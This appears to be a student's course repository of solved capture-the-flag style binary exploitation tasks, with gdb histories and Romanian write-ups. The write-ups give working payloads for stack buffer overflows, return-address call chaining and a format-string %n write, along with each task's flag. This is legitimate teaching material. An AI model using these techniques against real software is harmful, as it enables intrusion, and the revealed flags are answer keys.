All challenges

basic/.gdb_history

@@ -0,0 +1,27 @@
+start
+ni
+x 0x8049f14
+ni
+c
+x 0804a020
+x/wx 0804a020
+x/wx 0x0804a020
+start
+ni
+x/wx 0x0804a020
+ni
+x/wx 0x0804a020
+x/50wx 0x0804a020
+ni
+x/50wx 0x0804a020
+x/1000wx 0x0804a020
+context
+si
+ni
+x/1000wx 0x0804a020
+start
+x 0x804a000
+x/s 0x804a000
+x/20wx 0x804a000
+x/20wx 0x804a000-0x1be1
+ni

basic/basic-write-up

@@ -0,0 +1,9 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - basic
+
+Pentru rezolvarea acestui task am folosit comanda 'nm basic' care afiseaza
+toate simbolurile din binar. Una dintre liniile din output arata astfel:
+
+0804a020 B iocla_baby_steps
+
+Flagul este:
+iocla_baby_steps

basic/peda-session-basic.txt

@@ -0,0 +1,3 @@
+tbreak main
+
+

chain_call/.gdb_history

@@ -0,0 +1,113 @@
+start
+si
+ni
+ni
+r < <(python -c 'print "A"*0x8c + "\xeb\x84\x04\x08"')
+pdisass reader
+b *0x08048718
+r < <(python -c 'print "A"*0x8c + "\xeb\x84\x04\x08"')
+ni
+si
+c
+r < <(python -c 'print "A"*0x8c + "\x53\x86\x04\x08"')
+ni
+si
+ni
+r
+ni
+si
+ni
+set $eax=1
+ni
+x $ebp+0x8
+set ($ebp+0x8)=0xdeadbeef
+x $ebp+0x8
+context
+r
+ni
+si
+ni
+ni
+set $eax=1
+ni
+b*0x804866b
+r
+c
+set $eax=1
+ni
+x $ebp+0x8
+set {int}0xffffcb04=0xdeadbeef
+x $ebp+0x8
+ni
+ni
+p $ebp+0xc
+set {int}$8 = 0x88776655
+ni
+c
+x 0x804b160
+x/s 0x804b160
+r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08"')
+ni
+si
+ni
+ni
+ni
+set {int}0xffffcb00=0x08048653
+context
+si
+ni
+p $ebp+0x8
+set {int}$11=0xdeadbeef
+x $ebp+0x8
+p $ebp+0xc
+set {int}$12=88776655
+ni
+b first_hero
+b second_hero
+r
+c
+ni
+set {int}0xffffcb00=0x08048653
+ni
+c
+c
+r
+c
+ni
+set {int}0xffffcb00=0x08048653
+si
+ni
+set {int}$11=0xdeadbeef
+x $ebp+0x8
+x $ebp+0xc
+set {int}$12=0x88776655
+x $ebp+0xc
+ni
+c
+b*0x080486fe
+r < <(python -c 'print "A"*0x8c')
+ni
+r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08"')
+ni
+si
+ni
+r
+ni
+ni
+ni
+ni
+ni
+r
+ni
+r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08"')
+ni
+ni
+r
+ni
+r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + p32(0xdeadbeef) + p32(0x88776655)')
+ni
+ni
+r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + "AAAA" + p32(0xdeadbeef) + p32(0x88776655)')
+ni
+c
+r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + "AAAA" + p32(0xdeadbeef) + p32(0x88776655)')

chain_call/chain_call-write-up

@@ -0,0 +1,13 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - chain_call
+
+Payload-ul e generat cu urmatoarea comanda:
+python -c 'from pwn import *;print "A"*0x8c + p32(0x8048619) + p32(0x8048653) + "AAAA" + p32(0xdeadbeef) + p32(0x88776655)'
+
+Umplem 0x8c bytes pe stiva ca sa acoperim buffer-ul si vechiul ebp, apoi punem
+adresa lui first_hero ca noua adresa de return pentru functia reader. Urmatori
+4 bytes sunt noua adresa de return a lui first_hero, care e second_hero.
+Urmeaza 4 bytes de junk si numerele 0xdeadbeef si 0x88776655 care sunt folosite
+in cmp-urile din second_hero.
+
+Flagul este:
+iocla_sometimes_its_good_to_be_chained

chain_call/flag

@@ -0,0 +1 @@
+iocla_sometimes_its_good_to_be_chained

chain_call/peda-session-chain_call.txt

@@ -0,0 +1,2 @@
+break *0x080486fe
+

find_me_if_you_can/.gdb_history

@@ -0,0 +1,37 @@
+start
+si
+ni
+startni
+ni
+ni
+r < <(python -c "print 'A'*(0x1c+4) + '\xbc\x84\x04\x08'")
+pdisass reader
+b*0x08048678
+r < <(python -c "print 'A'*(0x1c+4) + '\xbc\x84\x04\x08'")
+ni
+r < <(python -c "print 'A'*(0x1c+4) + '\xcb\x84\x04\x08'")
+c
+ls
+start
+si
+ni
+p $eip
+b *$1
+r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080484cb)')
+ni
+c
+pdisass reader
+b*0x0804865e
+r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9)')
+ni
+si
+ni
+r
+ni
+r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9) + "AAAA" + p32(1) + p32(2)')
+ni
+si
+ni
+ni
+c
+r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9) + "AAAA" + p32(1) + p32(2)')

find_me_if_you_can/find_me_if_you_can-write-up

@@ -0,0 +1,12 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - find_me_if_you_can
+
+Payload-ul e generat cu urmatoarea comanda:
+python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9) + "AAAA" + p32(1) + p32(2)'
+
+Umplem buffer-ul si vechiul ebp pentru a ajunge la adresa de return. Mai apoi
+schimbam adresa de return cu cea a functiei vuln. Pentru a reusi sa trecem
+de cmp-urile din vuln trebuie ca la ebp+0x8 si ebp+0xc sa punem numerele 1
+si 2. In plus se mai adauga junk la ebp+0x4.
+
+Flagul este:
+iocla_rullzzzz

find_me_if_you_can/peda-session-find_me_if_you_can.txt

@@ -0,0 +1,3 @@
+break *0x0804865e
+
+

format_string/.gdb_history

@@ -0,0 +1,108 @@
+start
+ni
+start AAAA
+ni
+telescope 0xffffc8f0
+telescope 0xffffc8f0 30
+ni
+x 0x8049ab4
+x/10wx 0x8049ab4
+ni
+start A A A A A A A A A A A A A A A A A A A
+ni
+ni
+ni
+x 0x8049ab4
+ni
+set $eax=0x14
+ni
+si
+ni
+c
+start
+pdisass main
+start
+ni
+start AAAA
+
+ni
+ni
+ni
+start AAAA
+ni
+ni
+x 0x8049a84
+x 0x8049a84+0x30
+r
+start AAAA
+ni
+ni
+checksec 
+ni
+start AAAA B 
+x 0x8049998
+x/30wx 0x8049998
+ni
+b*0x080486de
+r AAAA
+r AAAAAAAA
+ni
+p 0xffffc8e0-0xffffcae0
+p -0xffffc8e0+0xffffcae0
+ni
+start AAA
+ni
+start
+start AAAA
+ni
+pdisass main
+b*0x080486de
+r
+ni
+p 0xffffcae0-0xffffc8e0
+r < <(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
+r <(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
+r $(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
+ni
+ni
+r $(python -c 'from pwn import *;print "A"*0x200 + p32(0xffffc8c0) +"B"*8 + p32(0x08048609)')
+ni
+r $(python -c 'from pwn import *;print "A"*0x200 + p32(0xffffc8cc) +"B"*8 + p32(0x08048609)')
+ni
+start
+start AAAA
+ni
+ni
+star "%d\n"
+start "%d\n"
+ni
+start
+start AAAA
+ni
+telescope 0xffffc8d0
+telescope 0xffffc8d0 40
+start $(python -c 'print "\xb4\x9a\x04\x08" + "%n"')
+ni
+pdisass main
+b*0x08048667
+r $(python -c 'print "\xb4\x9a\x04\x08" + "%n"')
+ni
+ni
+ni
+b main
+r $(python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"')
+ni
+pdisass main
+r
+r AAAA
+pdisass main
+b*0x0804869d
+r
+ r AAAA
+ni
+shell cat format_string-write-up 
+r < <(python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"')
+r `python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"'`
+ni
+r
+ls

format_string/format_string-write-up

@@ -0,0 +1,13 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - format_string
+
+Argumentul in linia de comanda dat pentru rezolvare este generat cu urmatoarea
+comanda:
+python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"'
+
+Primul lucru prezent este adresa care vrem sa fie suprascrisa cu valoarea 0x14.
+Dupa care sunt prezenti inca 16 bytes de junk ca mai apoi sa apara
+specificatorul "%n" care pune intr-o adresa de memorie(adresa prezenta la
+inceputul payloadului) numarul de bytes scrisi pana la momentul actual.
+
+Flagul este:
+iocla_ayyyy_macarena!!

format_string/peda-session-format_string.txt

@@ -0,0 +1,2 @@
+break *0x0804869d
+

guess/.gdb_history

@@ -0,0 +1,6 @@
+start
+ni
+ni
+x/s 0x80487b5 
+ni
+ni

guess/guess-write-up

@@ -0,0 +1,7 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - guess
+
+Pentru a rezolva acest task trebuie sa citim de la stdin numarul 0xeb62 pentru
+a trece cu succes de instructiunea 'cmp eax, 0xeb62' si a obtine flagul.
+
+Flagul este:
+iocla_all_warmed_up

guess/peda-session-guess.txt

@@ -0,0 +1,17 @@
+tbreak main
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

hide_and_go_seek/.gdb_history

@@ -0,0 +1,36 @@
+start
+si
+ni
+ni
+ni
+r < <(python -c 'print "A"*(0x1c+4)+"\xcb\x84\x04\x08"')
+b*0x0804864d
+r < <(python -c 'from pwn import *;print "A"*20 + p32(0x080485f9)')
+ni
+r < <(python -c 'from pwn import *;print "A"*20 + p32(0x080485f9)')
+ni
+r
+telescope 0xffffcaa0
+telescope 0xffffcaa0 40
+ni
+telescope 0xffffcaa0 40
+p/d 0x1c
+p/d 0x20
+r
+p 0xffffcad8-0xffffcaa0 
+r < <(python -c 'from pwn import *;print "A"*0x38 + p32(0x080485f9)')
+ni
+r < <(python -c 'from pwn import *;print "A"*20 + p32(0x080485f9)')
+ni
+r < <(python -c 'from pwn import *;print "A"*0x38 + p32(0x080485f9)')
+ni
+r
+ni
+x 0xffffcabc
+telescope 0xffffcabc
+r < <(python -c 'from pwn import *;print "A"*0x20 + p32(0x080485f9)')
+p 0xffffcad8-0xffffcabc
+ni
+x 0xffffcad8
+ni
+c

hide_and_go_seek/hide_and_go_seek-write-up

@@ -0,0 +1,10 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - hide_and_go_seek
+
+Payload-ul e generat cu urmatoaea comanda:
+python -c 'from pwn import *;print "A"*0x20 + p32(0x080485f9)'
+
+Umplem 0x20 bytes pe stiva ca sa acoperim buffer-ul si vechiul ebp, apoi punem
+adresa lui vuln ca noua adresa de return pentru functia main.
+
+Flagul este:
+iocla_pikaboooo

hide_and_go_seek/peda-session-hide_and_go_seek.txt

@@ -0,0 +1,2 @@
+break *0x0804864d
+

numbers_can_lie_too/.gdb_history

@@ -0,0 +1,14 @@
+start
+ni
+ni
+ni
+b*0x80486c5
+start
+ni
+ni
+x $ebp-0xa
+x/wx $ebp-0xa
+set $eax=0xffff
+context
+ni
+c

numbers_can_lie_too/numbers_can_lie_too-write-up

@@ -0,0 +1,8 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - chain_call
+
+Trebuie sa dam la stdin numarul 0xfffa(65530) pentru a se aduna mai apoi
+valoarea 5 la el. In final o sa fie comparat cu word-ul 0xffff si se va apela
+functia get_flag.
+
+Flagul este:
+iocla_math_has_always_been_a_lie

numbers_can_lie_too/peda-session-numbers_can_lie_too.txt

@@ -0,0 +1,2 @@
+break *0x80486c5
+

overflow_1/.gdb_history

@@ -0,0 +1,19 @@
+start
+ni
+ni
+start
+ni
+p $ebp-0xc
+ni
+ni
+b*0x804866d
+r
+ni
+r
+ni
+r
+ni
+r
+ni
+r < <(python -c 'print "A"*12 + "\xde\xed\xff\xab"')
+ni

overflow_1/overflow_1-write-up

@@ -0,0 +1,12 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - overflow_1
+
+Payload-ul e generat cu urmatoarea comanda:
+python -c 'from pwn import *;print "A"*12 + p32(0xabffedde)'
+
+Inceputul buffer-ului in care se citeste si variabila comparata cu numarul
+0xabffedde se afla la distanta de 0x18 - 0xc = 0xc bytes. Trebuie sa umplem 0xc
+bytes pentru a ajunge la inceputul variabilei, iar mai apoi sa scriem numarul
+dorit.
+
+Flagul este:
+iocla_I_did_not_chose_the_hack_life

overflow_1/peda-session-overflow_1.txt

@@ -0,0 +1,2 @@
+break *0x804866d
+

overflow_2/.gdb_history

@@ -0,0 +1,8 @@
+start
+ni
+b*0x8048696
+ni
+ni
+r < <(python -c 'print "A"*12 + "light" + "\x00")
+r < <(python -c 'print "A"*12 + "light" + "\x00"')
+ni

overflow_2/overflow_2-write-up

@@ -0,0 +1,12 @@
+elchapo187 - Popescu Lucian Ioan - luci.ion771@gmail.com - overflow_2
+
+Payload-ul e generat cu urmatoarea comanda:
+python -c 'print "A"*12 + "light" + "\x00"'
+
+Inceputul buffer-ului in care se citeste si variabila comparata cu stringul
+"light" se afla la distanta de 0x1a - 0xe = 0xc bytes. Trebuie sa umplem 0xc
+bytes pentru a ajunge la inceputul variabilei, iar apoi sa scriem stringul
+"light" urmat de un null byte pentru orice eventualitate.
+
+Flagul este:
+iocla_the_hack_life_ch0se_me

overflow_2/peda-session-overflow_2.txt

@@ -0,0 +1,2 @@
+break *0x8048696
+